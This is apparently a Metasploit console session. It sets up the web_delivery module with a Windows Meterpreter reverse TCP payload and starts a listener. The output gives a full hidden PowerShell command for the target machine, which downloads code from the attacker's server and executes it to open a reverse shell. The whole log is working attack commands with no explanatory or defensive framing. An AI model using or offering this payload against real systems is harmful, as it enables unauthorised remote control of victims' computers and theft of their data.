msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/script/web_delivery) > set LPORT 4455
LPORT => 4455
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4455
[*] Using URL: http://0.0.0.0:8080/kzwrDk2Sw56Et
[*] Local IP: http://1.1.1.1:8080/kzwrDk2Sw56Et
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $S=new-object net.webclient;$S.proxy=[Net.WebRequest]::GetSystemWebProxy();$S.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $S.downloadstring('http://1.1.1.1:8080/kzwrDk2Sw56Et');